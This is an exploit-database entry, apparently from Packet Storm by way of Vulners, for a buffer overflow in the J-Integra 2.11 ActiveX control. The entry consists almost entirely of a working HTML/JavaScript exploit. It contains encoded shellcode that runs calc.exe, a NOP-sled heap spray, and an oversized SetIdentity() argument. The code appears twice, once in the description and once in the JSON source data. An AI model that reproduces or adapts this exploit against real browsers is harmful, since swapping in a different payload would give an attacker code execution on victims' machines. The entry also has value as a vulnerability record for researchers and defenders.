Search...

J-Integra 2.11 Active-X Buffer Overflow

2010-12-01T00:00:00

ID PACKETSTORM:96290
Type packetstorm
Reporter Dr_IDE
Modified 2010-12-01T00:00:00

Description

                                        
                                            `&lt;!--  
Exploit Title: J-Integra v2.11 ActiveX SetIdentity() Buffer Overflow Exploit  
Found By: Dr_IDE  
Download: http://j-integra.intrinsyc.com/  
Greets: bz1p, bz1p@bshellz.net for finding the app.  
Tested on: XP SP3 IE7  
CVE: (0day)  
Notes: This is not the same control as EDB#15645  
--&gt;  
&lt;html&gt;  
&lt;object classid='clsid:8234E54E-20CB-4A88-9AB6-7986F99BE243' id='target'&gt;&lt;/object&gt;  
&lt;script&gt;  
//payload is windows/exec cmd=calc.exe  
shellcode = unescape(  
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+  
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+  
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+  
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+  
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+  
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+  
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+  
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');  
  
nops=unescape('%u9090%u9090');  
headersize =20;  
slackspace= headersize + shellcode.length;  
  
while(nops.length &lt; slackspace) nops+= nops;  
fillblock= nops.substring(0, slackspace);  
block= nops.substring(0, nops.length- slackspace);  
  
while( block.length+ slackspace&lt;0x50000) block= block+ block+ fillblock;  
memory=new Array();  
  
for( counter=0; counter&lt;200; counter++) memory[counter]= block + shellcode;  
ret='';  
for( counter=0; counter&lt;=1000; counter++) ret+=unescape("%0a%0a%0a%0a");  
  
arg2=String("abcd");  
target.SetIdentity(ret ,arg2);  
&lt;/script&gt;  
&lt;/html&gt;  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:96290", "type": "packetstorm", "bulletinFamily": "exploit", "title": "J-Integra 2.11 Active-X Buffer Overflow", "description": "", "published": "2010-12-01T00:00:00", "modified": "2010-12-01T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/96290/J-Integra-2.11-Active-X-Buffer-Overflow.html", "reporter": "Dr_IDE", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:32", "viewCount": 9, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2016-11-03T10:22:32", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:32", "rev": 2}, "vulnersScore": 1.2}, "sourceHref": "https://packetstormsecurity.com/files/download/96290/jintegra-overflow.txt", "sourceData": "` \n<html> \n<object classid='clsid:8234E54E-20CB-4A88-9AB6-7986F99BE243' id='target'></object> \n<script> \n//payload is windows/exec cmd=calc.exe \nshellcode = unescape( \n'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ \n'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ \n'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ \n'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ \n'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ \n'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ \n'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ \n'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'); \n \nnops=unescape('%u9090%u9090'); \nheadersize =20; \nslackspace= headersize + shellcode.length; \n \nwhile(nops.length < slackspace) nops+= nops; \nfillblock= nops.substring(0, slackspace); \nblock= nops.substring(0, nops.length- slackspace); \n \nwhile( block.length+ slackspace<0x50000) block= block+ block+ fillblock; \nmemory=new Array(); \n \nfor( counter=0; counter<200; counter++) memory[counter]= block + shellcode; \nret=''; \nfor( counter=0; counter<=1000; counter++) ret+=unescape(\"%0a%0a%0a%0a\"); \n \narg2=String(\"abcd\"); \ntarget.SetIdentity(ret ,arg2); \n</script> \n</html> \n \n`\n"}